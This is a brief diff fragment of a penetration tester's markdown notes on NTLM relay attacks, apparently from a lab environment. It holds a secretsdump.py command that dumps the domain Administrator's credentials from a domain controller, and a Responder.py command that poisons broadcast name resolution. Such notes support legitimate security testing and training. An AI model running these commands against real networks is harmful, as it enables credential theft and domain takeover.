ville87/offsec/Windows/NTLMRelayX.md

  - Run secretsdump on domain administrator:
    `secretsdump.py winlab.csnc.ch/hostname$@dc.winlab.csnc.ch -just-dc -just-dc-user Administrator`

- Note: For the poisoning, run Responder at the same time, but with SMB and HTTP server disabled for Responder:
+ Note: For the poisoning of broadcast messages, run Responder at the same time, but with SMB and HTTP server disabled for Responder.
+This is not required if you do targeted relaying where you trigger the victims connection to your ntlmrelayx host.
  - Start Responder.py with SMB and HTTP disabled: (disable them in /root/vkoch/Responder/Responder.conf)
    `sudo /opt/Responder/Responder.py -I eth1 -w -r -f -d`